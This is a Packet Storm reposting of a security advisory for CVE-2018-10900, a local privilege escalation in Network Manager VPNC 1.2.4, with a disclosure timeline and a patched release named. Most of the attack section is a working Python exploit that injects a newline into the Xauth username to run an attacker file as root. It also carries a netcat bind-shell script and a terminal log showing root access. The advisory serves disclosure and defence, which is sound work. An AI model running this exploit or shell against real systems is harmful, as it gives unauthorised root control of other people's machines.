exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Network Manager VPNC 1.2.4 Privilege Escalation

Network Manager VPNC 1.2.4 Privilege Escalation
Posted Jul 23, 2018
Authored by Denis Andzakovic

Network Manager VPNC version 1.2.4 suffers from a privilege escalation vulnerability.

tags | exploit
advisories | CVE-2018-10900
SHA-256 | 07086aef8c32f905b63b3ac0bd56d5717e5df977d219eaf6d7809892f46da39f

Network Manager VPNC 1.2.4 Privilege Escalation

Change Mirror Download
Network Manager VPNC - Privilege Escalation (CVE-2018-10900)

Release URL: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
Date Released: 21/07/2018
CVE: CVE-2018-10900
Author: Denis Andzakovic
Source: https://gitlab.gnome.org/GNOME/NetworkManager-vpnc
Affected Software: Network Manager VPNC a 1.2.4

--[ Description
The Network Manager VPNC plugin is vulnerable to a privilege escalation attack. A new line character can be used to inject a Password helper parameter into the configuration data passed to VPNC, allowing an attacker to execute arbitrary commands as root.

--[ Privilege Escalation

When initiating a VPNC connection, Network Manager spawns a new vpnc process and passes the configuration via STDIN. By injecting a \n character into a configuration parameter, an attacker can coerce Network Manager to set the Password helper option to an attacker controlled executable file.

The following python script generates a VPNC connection which will execute the /tmp/test file when connected. The new line character is injected into the Xauth username parameter.

import dbus
con = {
'vpn':{
'service-type':'org.freedesktop.NetworkManager.vpnc',
'data':{
'IKE DH Group':'dh2',
'IPSec ID':'testgroup',
'IPSec gateway':'gateway',
'IPSec secret-flags':'4',
'Local Port':'0',
'NAT Traversal Mode': 'natt',
'Perfect Forward Secrecy': 'server',
'Vendor': 'cisco',
'Xauth password-flags': '4',
'Xauth username': "username\nPassword helper /tmp/test",
'ipsec-secret-type': 'unused',
'xauth-password-type': 'unused'
}
},
'connection':{
'type':'vpn',
'id':'vpnc_test',
},
'ipv4':{'method':'auto'},
'ipv6':{'method':'auto'}
}
bus = dbus.SystemBus()
proxy = bus.get_object("org.freedesktop.NetworkManager", "/org/freedesktop/NetworkManager/Settings")
settings = dbus.Interface(proxy, "org.freedesktop.NetworkManager.Settings")
settings.AddConnection(con)

The above results in the following configuration being passed to the vpnc process when the connection is initialized:

Debug 0
Script /usr/local/libexec/nm-vpnc-service-vpnc-helper 0 3950 --bus-name org.freedesktop.NetworkManager.vpnc.Connection_4
Cisco UDP Encapsulation Port 0
Local Port 0
IKE DH Group dh2
Perfect Forward Secrecy server
Xauth username username
Password helper /tmp/test
IPSec gateway gateway
IPSec ID testgroup
Vendor cisco
NAT Traversal Mode natt

The following figure details the complete privilege escalation attack.

doi@ubuntu:~$ cat << EOF > /tmp/test
> #!/bin/bash
> mkfifo pipe
> nc -k -l -p 8080 < pipe | /bin/bash > pipe
> EOF
doi@ubuntu:~$ python vpnc_privesc.py
doi@ubuntu:~$ nmcli connection
NAME UUID TYPE DEVICE
Wired connection 1 a8b178fd-8cbc-3e15-aa9e-d52982215d98 ethernet ens3
vpnc_test 233101cb-f786-44ed-9e4f-662f1a519429 vpn ens3
doi@ubuntu:~$ nmcli connection up vpnc_test

^Z
[1]+ Stopped nmcli connection up vpnc_test
doi@ubuntu:~$ nc -vv 127.0.0.1 8080
Connection to 127.0.0.1 8080 port [tcp/http-alt] succeeded!
id
uid=0(root) gid=0(root) groups=0(root)

--[ Timeline

11/07/2018 - Advisory sent to security@gnome.org
13/07/2018 - Acknowledgement from Gnome security
20/07/2018 - CVE-2018-10900 assigned, patch scheduled for the following day
21/07/2018 - Network Manager VPNC 1.2.6 released
21/07/2018 - Advisory released

--[ About Pulse Security
Pulse Security is a specialist offensive security consultancy dedicated to providing best in breed security testing and review services.

W: https://pulsesecurity.co.nz
E: info at pulsesecurity.co.nz



Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close